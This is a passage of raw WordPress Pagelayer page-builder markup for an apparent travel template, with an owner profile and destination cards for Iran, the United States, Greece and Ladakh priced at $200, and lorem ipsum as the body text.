sagittis.u003c/pu003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"9zn9047\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"1zv7526\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"6\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"0px,10px,0px,10px\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"pagelayer-id\":\"yzg1330\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"u003ch5u003ePaul Volkmeru003c/h5u003e\",\"pagelayer-id\":\"xjd9615\"} --><h5>Paul Volkmer</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-44px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"u003ch3u003eOwneru003c/h3u003e\",\"pagelayer-id\":\"gno1604\"} --><h3>Owner</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003cpu003eDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"z0o5422\"} --><p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"6ub7505\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003eLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"gre2420\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.u003c/pu003e\",\"pagelayer-id\":\"w764798\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003cpu003e Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.u003c/pu003e\",\"pagelayer-id\":\"34b4400\"} --><p> Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin_tablet\":\"0em,0em,2em,0em\",\"ele_padding_mobile\":\"0px,0px,35px,0px\",\"text\":\"u003cpu003eNullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.u003c/pu003e\",\"pagelayer-id\":\"44l7184\"} --><p>Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"uqf6808\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"13\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https://www.youtube.com/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"700\",\"max-width_tablet\":\"100\",\"text\":\"n\",\"pagelayer-id\":\"ivt7491\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"00l6073\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"jqp4478\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003ch6u003eJourneyu003c/h6u003e\",\"pagelayer-id\":\"w4b1723\"} --><h6>Journey</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"u003ch5u003eYour Journey Starts Hereu003c/h5u003e\",\"pagelayer-id\":\"gcs5391\"} --><h5>Your Journey Starts Here</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"text\":\"u003ch2u003eStartsu003c/h2u003e\",\"pagelayer-id\":\"ovs9605\"} --><h2>Starts</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"u003cp style=u0022text-align: centeru0022u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. u003cbr /u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.u003cbr /u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.u003c/pu003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"u1h3147\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"hif8189\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"8\",\"pagelayer-id\":\"phd9001\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"11\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https://www.youtube.com/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin_mobile\":\"0em,0em,3em,0em\",\"text\":\"n\",\"pagelayer-id\":\"q4y7131\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"60px,20px,60px,20px\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"pagelayer-id\":\"mew6029\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"u003ch5u003eIranu003c/h5u003e\",\"pagelayer-id\":\"r4f2696\"} --><h5>Iran</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-44px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"u003ch3u003eIranu003c/h3u003e\",\"pagelayer-id\":\"oeu5019\"} --><h3>Iran</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"ele_padding_tablet\":\"0px,15px,0px,15px\",\"animation_delay\":\"600\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"rvc1332\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"$200.00\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"0,0,0,0\",\"btn_bg_color\":\"#efba6cff\",\"btn_color\":\"#ffffff\",\"ele_margin_mobile\":\"0em,0em,3em,0em\",\"btn_bg_color_hover\":\"\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#ffffffff\",\"pagelayer-id\":\"pdi7261\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_css\":\"@media screen and (max-width: 768px){n{{element}} .pagelayer-row-holder{ndisplay: flex;nflex-direction: column-reverse;n}n}\",\"pagelayer-id\":\"nih6890\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"60px,25px,60px,25px\",\"ele_padding_mobile\":\"60px,10px,60px,10px\",\"pagelayer-id\":\"keu7767\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"u003ch5u003eUnited Statesu003c/h5u003e\",\"pagelayer-id\":\"hj58313\"} --><h5>United States</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-50px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"u003ch3u003eUnited Statesu003c/h3u003e\",\"pagelayer-id\":\"gu02957\"} --><h3>United States</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"3l72038\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"$200.00\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"0,0,0,0\",\"btn_bg_color\":\"#efba6cff\",\"btn_color\":\"#ffffff\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#ffffffff\",\"pagelayer-id\":\"0701091\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"8\",\"pagelayer-id\":\"ghu2730\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"11\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https://www.youtube.com/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"n\",\"pagelayer-id\":\"pyk6019\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"zuh3015\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"8\",\"pagelayer-id\":\"0pq7867\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"11\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https://www.youtube.com/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"n\",\"pagelayer-id\":\"bhb1302\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"60px,25px,60px,25px\",\"ele_padding_mobile\":\"60px,10px,50px,10px\",\"pagelayer-id\":\"6pk4838\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"u003ch5u003eGreeceu003c/h5u003e\",\"pagelayer-id\":\"jtc1736\"} --><h5>Greece</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-44px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"u003ch3u003eGreeceu003c/h3u003e\",\"pagelayer-id\":\"o482659\"} --><h3>Greece</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"zol5629\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"$200.00\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"0,0,0,0\",\"btn_bg_color\":\"#efba6cff\",\"btn_color\":\"#ffffff\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#ffffffff\",\"pagelayer-id\":\"9b97127\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_css\":\"@media screen and (max-width: 768px){n{{element}} .pagelayer-row-holder{ndisplay: flex;nflex-direction: column-reverse;n}n}\",\"pagelayer-id\":\"11l9878\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"60px,25px,0px,25px\",\"ele_padding_mobile\":\"60px,10px,40px,10px\",\"pagelayer-id\":\"wdu2978\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"u003ch5u003eLe Ladakhu003c/h5u003e\",\"pagelayer-id\":\"fcg8162\"} --><h5>Le Ladakh</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-50px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"u003ch3u003eLe Ladakhu003c/h3u003e\",\"pagelayer-id\":\"ioc6422\"} --><h3>Le Ladakh</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"bdb4987\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"$200.00\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"0,0,0,0\",\"btn_bg_color\":\"#efba6cff\",\"btn_color\":\"#ffffff\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#ffffffff\",\"pagelayer-id\":\"dc32133\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"8\",\"pagelayer-id\":\"2aq6545\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"11\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https://www.youtube.com/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"n\",\"pagelayer-id\":\"6oq5032\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row 